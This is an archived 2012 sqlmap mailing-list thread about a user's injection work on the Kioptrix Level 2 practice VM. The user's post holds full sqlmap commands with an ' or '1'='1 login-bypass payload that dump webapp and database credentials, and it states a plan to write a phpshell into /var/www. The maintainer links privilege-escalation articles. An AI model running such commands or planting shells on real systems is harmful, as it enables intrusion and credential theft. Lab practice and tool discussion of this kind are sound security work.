Re: [sqlmap-users] escalating privileges
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] escalating privileges
|
From: Chris O. <chr...@gm...> - 2012-01-13 12:54:09
|
Can't wait... sqlmap is making me lazier by the day! On 13 January 2012 12:39, Miroslav Stampar <mir...@gm...>wrote: > Hi Phaedrus. > > Sorry, for the time being there is no such mechanism inside sqlmap. Also, > once implemented it will be most certainly limited to only MSSQL and Oracle > ( > http://www.abysssec.com/blog/2008/10/16/ms-sql-injection-privilege-scalation/& > http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/ > ). > > Kind regards, > Miroslav Stampar > > On Fri, Jan 13, 2012 at 5:02 AM, Phaedrus Black <pha...@gm...>wrote: > >> hello: >> >> I discovered a vulnerability that allows me to bypass the login screen. >> btw this is the Kioptrix Level 2 puzzle and not a live client/target. >> >> I've managed to dump credentials for the administrator's web interface in >> addition to the database users themselves. There were a few recon commands >> but the meatiest items are below. >> >> Specific commands included: >> >> >sudo python sqlmap.py -u "http://1 <http://172.16.207.129>92.168.1.1" >> --data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3 >> --string="Ping" -D webapp -T users --dump --proxy=http://127.0.0.1:8080 <--- >> gets me user credentials for the webapp >> >> >sudo python sqlmap.py -u "http://1 <http://172.16.207.129>92.168.1.1" >> --data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3 >> --string="Ping" --passwords --proxy=http://127.0.0.1:8080 <--- gets me >> user credentials for the DB. >> >> However, I've discovered that the db user that I am running as does >> **not** have the appropriate privileges to write >> files to the system. >> >> My objective is to write something like phpshell to the /var/www >> directory and go from there. >> >> Is there a way for sqlmap to switch from unprivileged user A to >> privileged user B if I have both sets of credentials? If so, I can then >> use the "file-write" and "file-dest" options. >> >> thanks, >> >> -pb >> >> >> >> >> >> >> ------------------------------------------------------------------------------ >> RSA(R) Conference 2012 >> Mar 27 - Feb 2 >> Save $400 by Jan. 27 >> Register now! >> http://p.sf.net/sfu/rsa-sfdev2dev2 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > RSA(R) Conference 2012 > Mar 27 - Feb 2 > Save $400 by Jan. 27 > Register now! > http://p.sf.net/sfu/rsa-sfdev2dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
